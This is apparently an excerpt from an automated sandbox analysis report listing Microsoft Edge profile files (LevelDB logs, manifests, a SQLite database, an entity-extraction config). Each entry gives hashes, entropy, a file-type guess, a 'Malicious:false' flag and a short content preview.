                                                                                                                                                                                                                                                                                                      SHA1:500A857382BF5D933E8B62F2A6BD26482F83312B
                                                                                                                                                                                                                                                                                                      SHA-256:682F5266097B0ACB48A01F57C9B7A684B01E2A15E060ABF3A9C00420951E0D5C
                                                                                                                                                                                                                                                                                                      SHA-512:9BAEA6E6D02AF3EDB9140B1AB717267B818A4D2BF891B11D9DA2A13D82A870AE8C53BEAB9F7497EAF4F2EA23B9E02BD8D0715374503AC5BCF9FACDA8E8141AAF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.587 1888 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/23-11:14:56.588 1888 Recovering log #3.2024/12/23-11:14:56.588 1888 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2229665746316725
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHtQ+q2PN723oH+TcwtnG2tMsIFUt8sOHgFkSgZmw+sOHgFkSQVkwON723oH+TR:xaHvVaYebn9GFUt8sagS/+sage5OaYeV
                                                                                                                                                                                                                                                                                                      MD5:B13FA7169E3CB56ABF801D5986A3EFB7
                                                                                                                                                                                                                                                                                                      SHA1:500A857382BF5D933E8B62F2A6BD26482F83312B
                                                                                                                                                                                                                                                                                                      SHA-256:682F5266097B0ACB48A01F57C9B7A684B01E2A15E060ABF3A9C00420951E0D5C
                                                                                                                                                                                                                                                                                                      SHA-512:9BAEA6E6D02AF3EDB9140B1AB717267B818A4D2BF891B11D9DA2A13D82A870AE8C53BEAB9F7497EAF4F2EA23B9E02BD8D0715374503AC5BCF9FACDA8E8141AAF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.587 1888 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/23-11:14:56.588 1888 Recovering log #3.2024/12/23-11:14:56.588 1888 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6130787838604517
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jrNUlpk9mL:TO8D4jJ/6Up+H0
                                                                                                                                                                                                                                                                                                      MD5:69427C44825D9A4450EFD625F5CA181C
                                                                                                                                                                                                                                                                                                      SHA1:C0FAEF275349A5F57A50D769B5098FFFF793DBE0
                                                                                                                                                                                                                                                                                                      SHA-256:4A34F4F409085227905BED26D67F5833C221066D57658D15E2B370F5DF513865
                                                                                                                                                                                                                                                                                                      SHA-512:AB2EACAE9DA0F84B11019FEA94D12992068737AA4F075B2F49ED481F8DC988810848D7D22197F56BFB21FDEEE33E25A202FB81D199B2B9B849A5C9D01652E011
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):375520
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.354147422341582
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:nA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:nFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                      MD5:70697135B9D5858366B42B8247CF5E69
                                                                                                                                                                                                                                                                                                      SHA1:1CEA98DC54C61D431AACDE34E5641B1D572A0CE9
                                                                                                                                                                                                                                                                                                      SHA-256:5F1FD9E2BBFE49DC4C3807FF21E2FB785C464B291B48894C23AD61A994F42443
                                                                                                                                                                                                                                                                                                      SHA-512:C9AB146D19FD35254ADFB6A0C984B34488CF097FF35905D61BC01E5C769E97F310C9C600AD58796401DA4FB8DE75A7F9E248106120DE7BB7D3E8D3B6A5C9EF1D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379444105010953..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):313
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.151583747034428
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:x4LXLM1N723oH+Tcwtk2WwnvB2KLlb4LRS2I34q2PN723oH+Tcwtk2WwnvIFUv:x4DLsaYebkxwnvFLp4lG4vVaYebkxwnp
                                                                                                                                                                                                                                                                                                      MD5:29A03F1A1AF81B8DEB7FDF05CD706F25
                                                                                                                                                                                                                                                                                                      SHA1:E90C78FB8A3EF8969ABBF2E821734F1456AE9275
                                                                                                                                                                                                                                                                                                      SHA-256:D6936CEC07E5BB1B11C787EB9486F4DA8D26B19BECABB2086E792C00C1BF18C3
                                                                                                                                                                                                                                                                                                      SHA-512:9AD59ACF62F3BB44C1468A179F42EE28FB4C0F3B66B6E96F29A0FBE19A7A70091974FAF7E575035503B3E35CA770E63C6B4C6C26417B9DDBD7D84A9A8ACDC0C9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:02.358 8c4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/23-11:15:02.477 8c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):358860
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.324614382099393
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RK:C1gAg1zfvi
                                                                                                                                                                                                                                                                                                      MD5:D385D780131A67C39C64CEF771211DE1
                                                                                                                                                                                                                                                                                                      SHA1:4E1FE2FB7E8CE2789A35B864FC2BADC722E763D3
                                                                                                                                                                                                                                                                                                      SHA-256:B9EE43FABF727E6DB0EF9F6CABFE30EE949F092525F18AD13196D011AB02BEEF
                                                                                                                                                                                                                                                                                                      SHA-512:A4C9269CC3F934F45E7CBBD1F42ED442ACEA0FC303AA28C001E67FF382C940A38B3F367C9ED5713F0992C3EFE2294F405A7981B948707E4685F09D7C307C3F4B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1807709376661615
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHQnYVq2PN723oH+Tcwt8aPrqIFUt8sOH1agZmw+sOH1aIkwON723oH+Tcwt8a4:xaQYVvVaYebL3FUt8sa1ag/+sa1aI5Of
                                                                                                                                                                                                                                                                                                      MD5:A903C8D6610B4D1EC680E77D1A2104EC
                                                                                                                                                                                                                                                                                                      SHA1:5C5F4DB7B6B31B45D13D4D0D11D7F10A8C7913EF
                                                                                                                                                                                                                                                                                                      SHA-256:7B1FFA2439E7F2E6E1706C541FCF05441473C63624703742ACC16D07DED26118
                                                                                                                                                                                                                                                                                                      SHA-512:52979729C839A8757BB250B062097A3F987BB5A77F8C072DEF94502C5CDCDFCB048CEDE47C1722042279AF62CB1FCC57B22811C1DC5451A651DD6351FCE201E4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.647 d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/23-11:14:56.686 d40 Recovering log #3.2024/12/23-11:14:56.686 d40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1807709376661615
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHQnYVq2PN723oH+Tcwt8aPrqIFUt8sOH1agZmw+sOH1aIkwON723oH+Tcwt8a4:xaQYVvVaYebL3FUt8sa1ag/+sa1aI5Of
                                                                                                                                                                                                                                                                                                      MD5:A903C8D6610B4D1EC680E77D1A2104EC
                                                                                                                                                                                                                                                                                                      SHA1:5C5F4DB7B6B31B45D13D4D0D11D7F10A8C7913EF
                                                                                                                                                                                                                                                                                                      SHA-256:7B1FFA2439E7F2E6E1706C541FCF05441473C63624703742ACC16D07DED26118
                                                                                                                                                                                                                                                                                                      SHA-512:52979729C839A8757BB250B062097A3F987BB5A77F8C072DEF94502C5CDCDFCB048CEDE47C1722042279AF62CB1FCC57B22811C1DC5451A651DD6351FCE201E4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.647 d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/23-11:14:56.686 d40 Recovering log #3.2024/12/23-11:14:56.686 d40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):329
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.205673190755646
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHUVq2PN723oH+Tcwt865IFUt8sOHgwgZmw+sOHgwIkwON723oH+Tcwt86+ULJ:xaUVvVaYeb/WFUt8saTg/+saTI5OaYev
                                                                                                                                                                                                                                                                                                      MD5:A11AB6D3A48387E146F84AD3F9AEF2F6
                                                                                                                                                                                                                                                                                                      SHA1:E6A80378118CF50FD299C15BEC7E5834C9A1AF01
                                                                                                                                                                                                                                                                                                      SHA-256:B3DCB9B45804B5FCAB391C255FE4C19C08CCCB656763AEB930937CBD3948866D
                                                                                                                                                                                                                                                                                                      SHA-512:76F2F4FE97314947D05154DA66015F47F6E2ACD5C9BADC60E4F5B59AB5DBC4A98B07838EDF8585AC24F922EE6A696BE06CFEC6EFDB5AAB52B74118F8F38096B9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.794 d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/23-11:14:56.795 d40 Recovering log #3.2024/12/23-11:14:56.795 d40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):329
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.205673190755646
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHUVq2PN723oH+Tcwt865IFUt8sOHgwgZmw+sOHgwIkwON723oH+Tcwt86+ULJ:xaUVvVaYeb/WFUt8saTg/+saTI5OaYev
                                                                                                                                                                                                                                                                                                      MD5:A11AB6D3A48387E146F84AD3F9AEF2F6
                                                                                                                                                                                                                                                                                                      SHA1:E6A80378118CF50FD299C15BEC7E5834C9A1AF01
                                                                                                                                                                                                                                                                                                      SHA-256:B3DCB9B45804B5FCAB391C255FE4C19C08CCCB656763AEB930937CBD3948866D
                                                                                                                                                                                                                                                                                                      SHA-512:76F2F4FE97314947D05154DA66015F47F6E2ACD5C9BADC60E4F5B59AB5DBC4A98B07838EDF8585AC24F922EE6A696BE06CFEC6EFDB5AAB52B74118F8F38096B9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.794 d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/23-11:14:56.795 d40 Recovering log #3.2024/12/23-11:14:56.795 d40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1254
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                      MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                      SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                      SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                      SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.152961418081467
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOyv4q2PN723oH+Tcwt8NIFUt8sOvTZmw+sOvJkwON723oH+Tcwt8+eLJ:x/4vVaYebpFUt8sST/+sSJ5OaYebqJ
                                                                                                                                                                                                                                                                                                      MD5:87D036C68349CD122ABC95CA3AE89B3D
                                                                                                                                                                                                                                                                                                      SHA1:536B9E8C7D4DB985EDE5BD1786708BE8DA301211
                                                                                                                                                                                                                                                                                                      SHA-256:79063868DA8E91A77AFA0BF1ACDA004D8F1B8A24F0A75B5345BAA77D953EE3B9
                                                                                                                                                                                                                                                                                                      SHA-512:BF413B9BACF582FA47D619DBC99540309DEA276EA26911DADB87ECCD8A42EE8E386DA194B6172259051C03DFD099F5A320BB9093AE953FD358D3597AC86C16CB
